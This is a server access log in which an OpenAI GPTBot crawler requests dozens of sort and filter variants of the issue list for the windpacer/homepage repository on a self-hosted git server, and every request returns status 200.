"/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 